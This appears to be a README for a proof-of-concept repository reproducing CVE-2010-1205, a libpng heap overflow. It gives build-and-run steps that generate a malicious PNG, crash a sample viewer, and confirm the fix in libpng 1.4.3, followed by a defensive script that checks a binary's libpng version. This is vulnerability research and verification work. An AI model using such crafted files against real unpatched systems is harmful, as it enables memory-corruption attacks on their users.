Sample exploit using the CVE-2010-1205 vulnerability in libpng (<=1.4.2)

gregbook - set of sample programs distributed with the libpng sources
generate - generates a malicious png file which triggers a heap overflow while the file is read with libpng

Steps to reproduce:

    ./build.sh                   # build all libraries and executables; gregbook/rpng2-x is linked against libpng-1.4.2 (buggy)
    ./generate/build/generate    # generates xploit.png, a malformed png file
    cd gregbook/
    ./rpng2-x ../xploit.png      # run the example which shows how to use libpng to display a png file; ends with Segmentation fault

Steps to run with the fixed libpng version (1.4.3):

In gregbook/Makefile edit line 33:

    PNGDIR = ../libpng-1.4.3

In the gregbook directory run:

    make clean && make
    ./rpng2-x ../xploit.png      # opens a window with the png file
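To confirm which libpng a binary such as gregbook/rpng2-x was really built against, before and after the PNGDIR change, the following added example (not part of the original README) extracts the libpng version banner embedded in a file and classifies it using only the version bounds stated above. It assumes the library is linked statically, so that its "libpng version X.Y.Z" banner string is present in the binary; the function names are hypothetical.

```shell
#!/bin/sh
# Added example: find the libpng version banner inside a binary and classify
# it for CVE-2010-1205 using the bounds from this page (<=1.4.2 buggy, 1.4.3 fixed).
# Assumption: the file embeds libpng's "libpng version X.Y.Z" banner, as a
# statically linked program or the libpng library file itself does.

# Print the embedded libpng version found in file $1 (empty if none).
libpng_embedded_version() {
    # tr splits the binary into printable runs, like a minimal `strings`.
    LC_ALL=C tr -c '[:print:]' '\n' < "$1" |
        sed -n 's/.*libpng version \([0-9][0-9]*\.[0-9][0-9]*\.[0-9][0-9]*\).*/\1/p' |
        head -n 1
}

# Classify a version string $1: vulnerable | fixed | unknown-branch | no-banner.
classify_libpng_version() {
    if [ -z "$1" ]; then echo "no-banner"; return; fi
    major=${1%%.*}; rest=${1#*.}
    minor=${rest%%.*}; patch=${rest#*.}
    if [ "$major" -eq 1 ] && [ "$minor" -eq 4 ]; then
        if [ "$patch" -le 2 ]; then echo "vulnerable"; else echo "fixed"; fi
    else
        echo "unknown-branch"   # outside the 1.4.x range this page describes
    fi
}

# Classify the file $1 by its embedded banner.
check_binary() {
    if [ ! -r "$1" ]; then echo "unreadable"; return; fi
    classify_libpng_version "$(libpng_embedded_version "$1")"
}

# Usage: sh check_libpng.sh gregbook/rpng2-x [more files...]
if [ "$#" -gt 0 ]; then
    for f in "$@"; do
        printf '%s: %s\n' "$f" "$(check_binary "$f")"
    done
fi
```

A dynamically linked program does not carry the banner itself; run the check on the libpng shared object it loads instead.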